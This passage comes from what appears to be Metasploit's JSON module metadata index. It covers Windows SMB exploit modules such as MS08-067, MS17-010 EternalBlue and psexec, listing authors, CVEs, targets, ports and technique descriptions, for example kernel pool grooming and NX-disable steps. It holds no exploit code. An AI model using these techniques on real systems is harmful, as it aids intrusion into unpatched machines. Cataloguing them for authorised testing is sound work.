"Windows 2000 SP4"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/smb/ms04_031_netdde.rb",
"is_install_path": true,
"ref_name": "windows/smb/ms04_031_netdde",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/smb/ms05_039_pnp": {
"name": "MS05-039 Microsoft Plug and Play Service Overflow",
"full_name": "exploit/windows/smb/ms05_039_pnp",
"rank": 400,
"disclosure_date": "2005-08-09",
"type": "exploit",
"author": [
"hdm <x@hdm.io>",
"cazz <bmc@shmoo.com>"
],
"description": "This module exploits a stack buffer overflow in the Windows Plug\n and Play service. This vulnerability can be exploited on\n Windows 2000 without a valid user account.\n\n NOTE: Since the PnP service runs inside the service.exe process, a failed\n exploit attempt will cause the system to automatically reboot.",
"references": [
"CVE-2005-1983",
"OSVDB-18605",
"BID-14513",
"MSB-MS05-039"
],
"platform": "Windows",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": [
"Windows 2000 SP0-SP4",
"Windows 2000 SP4 French",
"Windows 2000 SP4 Spanish",
"Windows 2000 SP4 English/French/German/Dutch",
"Windows 2000 SP0-SP4 German",
"Windows 2000 SP0-SP4 Italian",
"Windows XP SP1 English",
"Windows XP SP2 English (Requires Admin)",
"Windows Server 2003 SP0 English (Requires Admin)",
"Windows Server 2003 SP1 English (Requires Admin)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/smb/ms05_039_pnp.rb",
"is_install_path": true,
"ref_name": "windows/smb/ms05_039_pnp",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/smb/ms06_025_rasmans_reg": {
"name": "MS06-025 Microsoft RRAS Service RASMAN Registry Overflow",
"full_name": "exploit/windows/smb/ms06_025_rasmans_reg",
"rank": 400,
"disclosure_date": "2006-06-13",
"type": "exploit",
"author": [
"pusscat <pusscat@metasploit.com>",
"hdm <x@hdm.io>"
],
"description": "This module exploits a registry-based stack buffer overflow in the Windows Routing\n and Remote Access Service. Since the service is hosted inside svchost.exe,\n a failed exploit attempt can cause other system services to fail as well.\n A valid username and password is required to exploit this flaw on Windows 2000.\n When attacking XP SP1, the SMBPIPE option needs to be set to 'SRVSVC'.\n Exploiting this flaw involves two distinct steps - creating the registry key\n and then triggering an overwrite based on a read of this key. Once the key is\n created, it cannot be recreated. This means that for any given system, you\n only get one chance to exploit this flaw. Picking the wrong target will require\n a manual removal of the following registry key before you can try again:\n HKEY_USERS\\.DEFAULT\\Software\\Microsoft\\RAS Phonebook",
"references": [
"CVE-2006-2370",
"OSVDB-26437",
"BID-18325",
"MSB-MS06-025"
],
"platform": "Windows",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": [
"Windows 2000 SP4"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/smb/ms06_025_rasmans_reg.rb",
"is_install_path": true,
"ref_name": "windows/smb/ms06_025_rasmans_reg",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/smb/ms06_025_rras": {
"name": "MS06-025 Microsoft RRAS Service Overflow",
"full_name": "exploit/windows/smb/ms06_025_rras",
"rank": 200,
"disclosure_date": "2006-06-13",
"type": "exploit",
"author": [
"Nicolas Pouvesle <nicolas.pouvesle@gmail.com>",
"hdm <x@hdm.io>"
],
"description": "This module exploits a stack buffer overflow in the Windows Routing and Remote\n Access Service. Since the service is hosted inside svchost.exe, a failed\n exploit attempt can cause other system services to fail as well. A valid\n username and password is required to exploit this flaw on Windows 2000.\n When attacking XP SP1, the SMBPIPE option needs to be set to 'SRVSVC'.",
"references": [
"CVE-2006-2370",
"OSVDB-26437",
"BID-18325",
"MSB-MS06-025"
],
"platform": "Windows",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": [
"Automatic",
"Windows 2000 SP4",
"Windows XP SP1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/smb/ms06_025_rras.rb",
"is_install_path": true,
"ref_name": "windows/smb/ms06_025_rras",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/smb/ms06_040_netapi": {
"name": "MS06-040 Microsoft Server Service NetpwPathCanonicalize Overflow",
"full_name": "exploit/windows/smb/ms06_040_netapi",
"rank": 400,
"disclosure_date": "2006-08-08",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module exploits a stack buffer overflow in the NetApi32 CanonicalizePathName() function\n using the NetpwPathCanonicalize RPC call in the Server Service. It is likely that\n other RPC calls could be used to exploit this service. This exploit will result in\n a denial of service on Windows XP SP2 or Windows 2003 SP1. A failed exploit attempt\n will likely result in a complete reboot on Windows 2000 and the termination of all\n SMB-related services on Windows XP. The default target for this exploit should succeed\n on Windows NT 4.0, Windows 2000 SP0-SP4+, Windows XP SP0-SP1 and Windows 2003 SP0.",
"references": [
"CVE-2006-3439",
"OSVDB-27845",
"BID-19409",
"MSB-MS06-040"
],
"platform": "Windows",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": [
"(wcscpy) Automatic (NT 4.0, 2000 SP0-SP4, XP SP0-SP1)",
"(wcscpy) Windows NT 4.0 / Windows 2000 SP0-SP4",
"(wcscpy) Windows XP SP0/SP1",
"(stack) Windows XP SP1 English",
"(stack) Windows XP SP1 Italian",
"(wcscpy) Windows 2003 SP0"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/smb/ms06_040_netapi.rb",
"is_install_path": true,
"ref_name": "windows/smb/ms06_040_netapi",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/smb/ms06_066_nwapi": {
"name": "MS06-066 Microsoft Services nwapi32.dll Module Exploit",
"full_name": "exploit/windows/smb/ms06_066_nwapi",
"rank": 400,
"disclosure_date": "2006-11-14",
"type": "exploit",
"author": [
"pusscat <pusscat@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in the svchost service when the netware\n client service is running. This specific vulnerability is in the nwapi32.dll module.",
"references": [
"CVE-2006-4688",
"OSVDB-30260",
"BID-21023",
"MSB-MS06-066"
],
"platform": "Windows",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": [
"Windows XP SP2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/smb/ms06_066_nwapi.rb",
"is_install_path": true,
"ref_name": "windows/smb/ms06_066_nwapi",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/smb/ms06_066_nwwks": {
"name": "MS06-066 Microsoft Services nwwks.dll Module Exploit",
"full_name": "exploit/windows/smb/ms06_066_nwwks",
"rank": 400,
"disclosure_date": "2006-11-14",
"type": "exploit",
"author": [
"pusscat <pusscat@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in the svchost service, when the netware\n client service is running. This specific vulnerability is in the nwapi32.dll module.",
"references": [
"CVE-2006-4688",
"OSVDB-30260",
"BID-21023",
"MSB-MS06-066"
],
"platform": "Windows",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": [
"Windows XP SP2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/smb/ms06_066_nwwks.rb",
"is_install_path": true,
"ref_name": "windows/smb/ms06_066_nwwks",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/smb/ms06_070_wkssvc": {
"name": "MS06-070 Microsoft Workstation Service NetpManageIPCConnect Overflow",
"full_name": "exploit/windows/smb/ms06_070_wkssvc",
"rank": 0,
"disclosure_date": "2006-11-14",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in the NetApi32 NetpManageIPCConnect\n function using the Workstation service in Windows 2000 SP4 and Windows XP SP2.\n\n In order to exploit this vulnerability, you must specify the name of a\n valid Windows DOMAIN. It may be possible to satisfy this condition by using\n a custom DNS and LDAP setup, however that method is not covered here.\n\n Although Windows XP SP2 is vulnerable, Microsoft reports that Administrator\n credentials are required to reach the vulnerable code. Windows XP SP1 only\n requires valid user credentials. Also, testing shows that a machine already\n joined to a domain is not exploitable.",
"references": [
"CVE-2006-4691",
"OSVDB-30263",
"BID-20985",
"MSB-MS06-070"
],
"platform": "Windows",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": [
"Automatic Targetting",
"Windows 2000 SP4",
"Windows XP SP0/SP1"
],
"mod_time": "2017-09-17 16:00:04 +0000",
"path": "/modules/exploits/windows/smb/ms06_070_wkssvc.rb",
"is_install_path": true,
"ref_name": "windows/smb/ms06_070_wkssvc",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/smb/ms07_029_msdns_zonename": {
"name": "MS07-029 Microsoft DNS RPC Service extractQuotedChar() Overflow (SMB)",
"full_name": "exploit/windows/smb/ms07_029_msdns_zonename",
"rank": 0,
"disclosure_date": "2007-04-12",
"type": "exploit",
"author": [
"hdm <x@hdm.io>",
"Unknown"
],
"description": "This module exploits a stack buffer overflow in the RPC interface\n of the Microsoft DNS service. The vulnerability is triggered\n when a long zone name parameter is supplied that contains\n escaped octal strings. This module is capable of bypassing NX/DEP\n protection on Windows 2003 SP1/SP2. This module exploits the\n RPC service using the \\DNSSERVER pipe available via SMB. This\n pipe requires a valid user account to access, so the SMBUSER\n and SMBPASS options must be specified.",
"references": [
"CVE-2007-1748",
"OSVDB-34100",
"MSB-MS07-029",
"URL-http://www.microsoft.com/technet/security/advisory/935964.mspx"
],
"platform": "Windows",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": [
"Automatic (2000 SP0-SP4, 2003 SP0, 2003 SP1-SP2)",
"Windows 2000 Server SP0-SP4+ English",
"Windows 2000 Server SP0-SP4+ Italian",
"Windows 2000 Server SP0-SP4+ French",
"Windows 2003 Server SP0 English",
"Windows 2003 Server SP0 French",
"Windows 2003 Server SP1-SP2 English",
"Windows 2003 Server SP1-SP2 French",
"Windows 2003 Server SP1-SP2 Spanish",
"Windows 2003 Server SP1-SP2 Italian",
"Windows 2003 Server SP1-SP2 German"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/smb/ms07_029_msdns_zonename.rb",
"is_install_path": true,
"ref_name": "windows/smb/ms07_029_msdns_zonename",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/smb/ms08_067_netapi": {
"name": "MS08-067 Microsoft Server Service Relative Path Stack Corruption",
"full_name": "exploit/windows/smb/ms08_067_netapi",
"rank": 500,
"disclosure_date": "2008-10-28",
"type": "exploit",
"author": [
"hdm <x@hdm.io>",
"Brett Moore <brett.moore@insomniasec.com>",
"frank2 <frank2@dc949.org>",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a parsing flaw in the path canonicalization code of\n NetAPI32.dll through the Server Service. This module is capable of bypassing\n NX on some operating systems and service packs. The correct target must be\n used to prevent the Server Service (along with a dozen others in the same\n process) from crashing. Windows XP targets seem to handle multiple successful\n exploitation events, but 2003 targets will often crash or hang on subsequent\n attempts. This is just the first version of this module, full support for\n NX bypass on 2003, along with other platforms, is still in development.",
"references": [
"CVE-2008-4250",
"OSVDB-49243",
"MSB-MS08-067",
"URL-http://www.rapid7.com/vulndb/lookup/dcerpc-ms-netapi-netpathcanonicalize-dos"
],
"platform": "Windows",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": [
"Automatic Targeting",
"Windows 2000 Universal",
"Windows XP SP0/SP1 Universal",
"Windows 2003 SP0 Universal",
"Windows XP SP2 English (AlwaysOn NX)",
"Windows XP SP2 English (NX)",
"Windows XP SP3 English (AlwaysOn NX)",
"Windows XP SP3 English (NX)",
"Windows XP SP2 Arabic (NX)",
"Windows XP SP2 Chinese - Traditional / Taiwan (NX)",
"Windows XP SP2 Chinese - Simplified (NX)",
"Windows XP SP2 Chinese - Traditional (NX)",
"Windows XP SP2 Czech (NX)",
"Windows XP SP2 Danish (NX)",
"Windows XP SP2 German (NX)",
"Windows XP SP2 Greek (NX)",
"Windows XP SP2 Spanish (NX)",
"Windows XP SP2 Finnish (NX)",
"Windows XP SP2 French (NX)",
"Windows XP SP2 Hebrew (NX)",
"Windows XP SP2 Hungarian (NX)",
"Windows XP SP2 Italian (NX)",
"Windows XP SP2 Japanese (NX)",
"Windows XP SP2 Korean (NX)",
"Windows XP SP2 Dutch (NX)",
"Windows XP SP2 Norwegian (NX)",
"Windows XP SP2 Polish (NX)",
"Windows XP SP2 Portuguese - Brazilian (NX)",
"Windows XP SP2 Portuguese (NX)",
"Windows XP SP2 Russian (NX)",
"Windows XP SP2 Swedish (NX)",
"Windows XP SP2 Turkish (NX)",
"Windows XP SP3 Arabic (NX)",
"Windows XP SP3 Chinese - Traditional / Taiwan (NX)",
"Windows XP SP3 Chinese - Simplified (NX)",
"Windows XP SP3 Chinese - Traditional (NX)",
"Windows XP SP3 Czech (NX)",
"Windows XP SP3 Danish (NX)",
"Windows XP SP3 German (NX)",
"Windows XP SP3 Greek (NX)",
"Windows XP SP3 Spanish (NX)",
"Windows XP SP3 Finnish (NX)",
"Windows XP SP3 French (NX)",
"Windows XP SP3 Hebrew (NX)",
"Windows XP SP3 Hungarian (NX)",
"Windows XP SP3 Italian (NX)",
"Windows XP SP3 Japanese (NX)",
"Windows XP SP3 Korean (NX)",
"Windows XP SP3 Dutch (NX)",
"Windows XP SP3 Norwegian (NX)",
"Windows XP SP3 Polish (NX)",
"Windows XP SP3 Portuguese - Brazilian (NX)",
"Windows XP SP3 Portuguese (NX)",
"Windows XP SP3 Russian (NX)",
"Windows XP SP3 Swedish (NX)",
"Windows XP SP3 Turkish (NX)",
"Windows 2003 SP1 English (NO NX)",
"Windows 2003 SP1 English (NX)",
"Windows 2003 SP1 Japanese (NO NX)",
"Windows 2003 SP1 Spanish (NO NX)",
"Windows 2003 SP1 Spanish (NX)",
"Windows 2003 SP1 French (NO NX)",
"Windows 2003 SP1 French (NX)",
"Windows 2003 SP2 English (NO NX)",
"Windows 2003 SP2 English (NX)",
"Windows 2003 SP2 German (NO NX)",
"Windows 2003 SP2 German (NX)",
"Windows 2003 SP2 Portuguese - Brazilian (NX)",
"Windows 2003 SP2 Spanish (NO NX)",
"Windows 2003 SP2 Spanish (NX)",
"Windows 2003 SP2 Japanese (NO NX)",
"Windows 2003 SP2 French (NO NX)",
"Windows 2003 SP2 French (NX)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/smb/ms08_067_netapi.rb",
"is_install_path": true,
"ref_name": "windows/smb/ms08_067_netapi",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/smb/ms09_050_smb2_negotiate_func_index": {
"name": "MS09-050 Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference",
"full_name": "exploit/windows/smb/ms09_050_smb2_negotiate_func_index",
"rank": 400,
"disclosure_date": "2009-09-07",
"type": "exploit",
"author": [
"Laurent Gaffie <laurent.gaffie@gmail.com>",
"hdm <x@hdm.io>",
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "This module exploits an out of bounds function table dereference in the SMB\n request validation code of the SRV2.SYS driver included with Windows Vista, Windows 7\n release candidates (not RTM), and Windows 2008 Server prior to R2. Windows Vista\n without SP1 does not seem affected by this flaw.",
"references": [
"MSB-MS09-050",
"CVE-2009-3103",
"BID-36299",
"OSVDB-57799",
"URL-https://seclists.org/fulldisclosure/2009/Sep/0039.html",
"URL-http://www.microsoft.com/technet/security/Bulletin/MS09-050.mspx"
],
"platform": "Windows",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": [
"Windows Vista SP1/SP2 and Server 2008 (x86)"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/windows/smb/ms09_050_smb2_negotiate_func_index.rb",
"is_install_path": true,
"ref_name": "windows/smb/ms09_050_smb2_negotiate_func_index",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/smb/ms10_046_shortcut_icon_dllloader": {
"name": "Microsoft Windows Shell LNK Code Execution",
"full_name": "exploit/windows/smb/ms10_046_shortcut_icon_dllloader",
"rank": 600,
"disclosure_date": "2010-07-16",
"type": "exploit",
"author": [
"hdm <x@hdm.io>",
"jduck <jduck@metasploit.com>",
"B_H"
],
"description": "This module exploits a vulnerability in the handling of Windows\n Shortcut files (.LNK) that contain an icon resource pointing to a\n malicious DLL. This creates an SMB resource to provide the payload\n inside a DLL, and generates a LNK file which must be sent to the\n target.",
"references": [
"CVE-2010-2568",
"OSVDB-66387",
"MSB-MS10-046",
"URL-http://www.microsoft.com/technet/security/advisory/2286198.mspx",
"URL-https://github.com/rapid7/metasploit-framework/pull/4911"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/smb/ms10_046_shortcut_icon_dllloader.rb",
"is_install_path": true,
"ref_name": "windows/smb/ms10_046_shortcut_icon_dllloader",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/smb/ms10_061_spoolss": {
"name": "MS10-061 Microsoft Print Spooler Service Impersonation Vulnerability",
"full_name": "exploit/windows/smb/ms10_061_spoolss",
"rank": 600,
"disclosure_date": "2010-09-14",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>",
"hdm <x@hdm.io>"
],
"description": "This module exploits the RPC service impersonation vulnerability detailed in\n Microsoft Bulletin MS10-061. By making a specific DCE RPC request to the\n StartDocPrinter procedure, an attacker can impersonate the Printer Spooler service\n to create a file. The working directory at the time is %SystemRoot%\\system32.\n An attacker can specify any file name, including directory traversal or full paths.\n By sending WritePrinter requests, an attacker can fully control the content of\n the created file.\n\n In order to gain code execution, this module writes to a directory used by Windows\n Management Instrumentation (WMI) to deploy applications. This directory (Wbem\\Mof)\n is periodically scanned and any new .mof files are processed automatically. This is\n the same technique employed by the Stuxnet code found in the wild.",
"references": [
"OSVDB-67988",
"CVE-2010-2729",
"MSB-MS10-061"
],
"platform": "Windows",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": [
"Windows Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/smb/ms10_061_spoolss.rb",
"is_install_path": true,
"ref_name": "windows/smb/ms10_061_spoolss",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/smb/ms15_020_shortcut_icon_dllloader": {
"name": "Microsoft Windows Shell LNK Code Execution",
"full_name": "exploit/windows/smb/ms15_020_shortcut_icon_dllloader",
"rank": 600,
"disclosure_date": "2015-03-10",
"type": "exploit",
"author": [
"Michael Heerklotz",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability in the MS10-046 patch to abuse (again) the handling\n of Windows Shortcut files (.LNK) that contain an icon resource pointing to a malicious\n DLL. This creates an SMB resource to provide the payload and the trigger, and generates a\n LNK file which must be sent to the target. This module has been tested successfully on\n Windows 2003 SP2 with MS10-046 installed and Windows 2008 SP2 (32 bits) with MS14-027\n installed.",
"references": [
"CVE-2015-0096",
"MSB-MS15-020",
"URL-http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Full-details-on-CVE-2015-0096-and-the-failed-MS10-046-Stuxnet/ba-p/6718459#.VQBOymTF9so",
"URL-https://github.com/rapid7/metasploit-framework/pull/4911"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/smb/ms15_020_shortcut_icon_dllloader.rb",
"is_install_path": true,
"ref_name": "windows/smb/ms15_020_shortcut_icon_dllloader",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/smb/ms17_010_eternalblue": {
"name": "MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption",
"full_name": "exploit/windows/smb/ms17_010_eternalblue",
"rank": 200,
"disclosure_date": "2017-03-14",
"type": "exploit",
"author": [
"Sean Dillon <sean.dillon@risksense.com>",
"Dylan Davis <dylan.davis@risksense.com>",
"Equation Group",
"Shadow Brokers",
"thelightcosine"
],
"description": "This module is a port of the Equation Group ETERNALBLUE exploit, part of\n the FuzzBunch toolkit released by Shadow Brokers.\n\n There is a buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size\n is calculated in Srv!SrvOs2FeaListSizeToNt, with mathematical error where a\n DWORD is subtracted into a WORD. The kernel pool is groomed so that overflow\n is well laid-out to overwrite an SMBv1 buffer. Actual RIP hijack is later\n completed in srvnet!SrvNetWskReceiveComplete.\n\n This exploit, like the original may not trigger 100% of the time, and should be\n run continuously until triggered. It seems like the pool will get hot streaks\n and need a cool down period before the shells rain in again.\n\n The module will attempt to use Anonymous login, by default, to authenticate to perform the\n exploit. If the user supplies credentials in the SMBUser, SMBPass, and SMBDomain options it will use\n those instead.\n\n On some systems, this module may cause system instability and crashes, such as a BSOD or\n a reboot. This may be more likely with some payloads.",
"references": [
"MSB-MS17-010",
"CVE-2017-0143",
"CVE-2017-0144",
"CVE-2017-0145",
"CVE-2017-0146",
"CVE-2017-0147",
"CVE-2017-0148",
"URL-https://github.com/RiskSense-Ops/MS17-010"
],
"platform": "Windows",
"arch": "",
"rport": 445,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 7 and Server 2008 R2 (x64) All Service Packs"
],
"mod_time": "2018-11-05 17:16:16 +0000",
"path": "/modules/exploits/windows/smb/ms17_010_eternalblue.rb",
"is_install_path": true,
"ref_name": "windows/smb/ms17_010_eternalblue",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
"AKA": [
"ETERNALBLUE"
]
}
},
"exploit_windows/smb/ms17_010_eternalblue_win8": {
"name": "MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+",
"full_name": "exploit/windows/smb/ms17_010_eternalblue_win8",
"rank": 200,
"disclosure_date": "2017-03-14",
"type": "exploit",
"author": [
"Equation Group",
"Shadow Brokers",
"sleepya",
"wvu <wvu@metasploit.com>"
],
"description": "EternalBlue exploit for Windows 8, Windows 10, and 2012 by sleepya\n The exploit might FAIL and CRASH a target system (depended on what is overwritten)\n The exploit support only x64 target\n\n Tested on:\n - Windows 2012 R2 x64\n - Windows 8.1 x64\n - Windows 10 Pro Build 10240 x64\n - Windows 10 Enterprise Evaluation Build 10586 x64\n\n\n Default Windows 8 and later installation without additional service info:\n - anonymous is not allowed to access any share (including IPC$)\n - More info: https://support.microsoft.com/en-us/help/3034016/ipc-share-and-null-session-behavior-in-windows\n - tcp port 445 is filtered by firewall\n\n\n Reference:\n - http://blogs.360.cn/360safe/2017/04/17/nsa-eternalblue-smb/\n - \"Bypassing Windows 10 kernel ASLR (remote) by Stefan Le Berre\" https://drive.google.com/file/d/0B3P18M-shbwrNWZTa181ZWRCclk/edit\n\n\n Exploit info:\n - If you do not know how exploit for Windows 7/2008 work. Please read my exploit for Windows 7/2008 at\n https://gist.github.com/worawit/bd04bad3cd231474763b873df081c09a because the trick for exploit is almost the same\n - The exploit use heap of HAL for placing fake struct (address 0xffffffffffd00e00) and shellcode (address 0xffffffffffd01000).\n On Windows 8 and Wndows 2012, the NX bit is set on this memory page. Need to disable it before controlling RIP.\n - The exploit is likely to crash a target when it failed\n - The overflow is happened on nonpaged pool so we need to massage target nonpaged pool.\n - If exploit failed but target does not crash, try increasing 'GroomAllocations' value (at least 5)\n - See the code and comment for exploit detail.\n\n\n Disable NX method:\n - The idea is from \"Bypassing Windows 10 kernel ASLR (remote) by Stefan Le Berre\" (see link in reference)\n - The exploit is also the same but we need to trigger bug twice\n - First trigger, set MDL.MappedSystemVa to target pte address\n - Write '\\x00' to disable the NX flag\n - Second trigger, do the same as Windows 7 exploit\n - From my test, if exploit disable NX successfully, I always get code execution",
"references": [
"MSB-MS17-010",
"CVE-2017-0143",
"CVE-2017-0144",
"CVE-2017-0145",
"CVE-2017-0146",
"CVE-2017-0147",
"CVE-2017-0148",
"EDB-42030",
"URL-https://github.com/worawit/MS17-010"
],
"platform": "Windows",
"arch": "x64",
"rport": 445,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"win x64"
],
"mod_time": "2018-10-11 17:23:59 +0000",
"path": "/modules/exploits/windows/smb/ms17_010_eternalblue_win8.py",
"is_install_path": true,
"ref_name": "windows/smb/ms17_010_eternalblue_win8",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
"AKA": [
"ETERNALBLUE"
]
}
},
"exploit_windows/smb/ms17_010_psexec": {
"name": "MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution",
"full_name": "exploit/windows/smb/ms17_010_psexec",
"rank": 300,
"disclosure_date": "2017-03-14",
"type": "exploit",
"author": [
"sleepya",
"zerosum0x0",
"Shadow Brokers",
"Equation Group"
],
"description": "This module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where\n primitive. This will then be used to overwrite the connection session information with as an\n Administrator session. From there, the normal psexec payload code execution is done.\n\n Exploits a type confusion between Transaction and WriteAndX requests and a race condition in\n Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy\n exploits. This exploit chain is more reliable than the EternalBlue exploit, but requires a\n named pipe.",
"references": [
"MSB-MS17-010",
"CVE-2017-0143",
"CVE-2017-0146",
"CVE-2017-0147",
"URL-https://github.com/worawit/MS17-010",
"URL-https://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf",
"URL-https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/"
],
"platform": "Windows",
"arch": "x86, x64",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": [
"Automatic",
"PowerShell",
"Native upload",
"MOF upload"
],
"mod_time": "2019-01-16 11:23:21 +0000",
"path": "/modules/exploits/windows/smb/ms17_010_psexec.rb",
"is_install_path": true,
"ref_name": "windows/smb/ms17_010_psexec",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
"AKA": [
"ETERNALSYNERGY",
"ETERNALROMANCE",
"ETERNALCHAMPION",
"ETERNALBLUE"
]
}
},
"exploit_windows/smb/netidentity_xtierrpcpipe": {
"name": "Novell NetIdentity Agent XTIERRPCPIPE Named Pipe Buffer Overflow",
"full_name": "exploit/windows/smb/netidentity_xtierrpcpipe",
"rank": 500,
"disclosure_date": "2009-04-06",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>",
"Ruben Santamarta"
],
"description": "This module exploits a stack buffer overflow in Novell's NetIdentity Agent. When sending\n a specially crafted string to the 'XTIERRPCPIPE' named pipe, an attacker may be\n able to execute arbitrary code. The success of this module is much greater once the\n service has been restarted.",
"references": [
"CVE-2009-1350",
"OSVDB-53351",
"BID-34400",
"URL-http://www.reversemode.com/index.php?option=com_content&task=view&id=62&Itemid=1"
],
"platform": "Windows",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": [
"Windows 2000 / Windows XP / Windows 2003"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/smb/netidentity_xtierrpcpipe.rb",
"is_install_path": true,
"ref_name": "windows/smb/netidentity_xtierrpcpipe",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_windows/smb/psexec": {
"name": "Microsoft Windows Authenticated User Code Execution",
"full_name": "exploit/windows/smb/psexec",
"rank": 0,
"disclosure_date": "1999-01-01",
"type": "exploit",
"author": [
"hdm <x@hdm.io>",
"Royce Davis <rdavis@accuvant.com>",
"RageLtMan <rageltman@sempervictus>"
],
"description": "This module uses a valid administrator username and password (or\n password hash) to execute an arbitrary payload. This module is similar\n to the \"psexec\" utility provided by SysInternals. This module is now able\n to clean up after itself. The service created by this tool uses a randomly\n chosen name and description.",
"references": [
"CVE-1999-0504",
"OSVDB-3106",
"URL-http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx",
"URL-https://www.optiv.com/blog/owning-computers-without-shell-access",
"URL-http://sourceforge.net/projects/smbexec/"
],
"platform": "Windows",
"arch": "x86, x64",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": [
"Automatic",
"PowerShell",
"Native upload",
"MOF upload"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/windows/smb/psexec.rb",
"is_install_path": true,
"ref_name": "windows/smb/psexec",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_windows/smb/psexec_psh": {
"name": "Microsoft Windows Authenticated Powershell Command Execution",
"full_name": "exploit/windows/smb/psexec_psh",
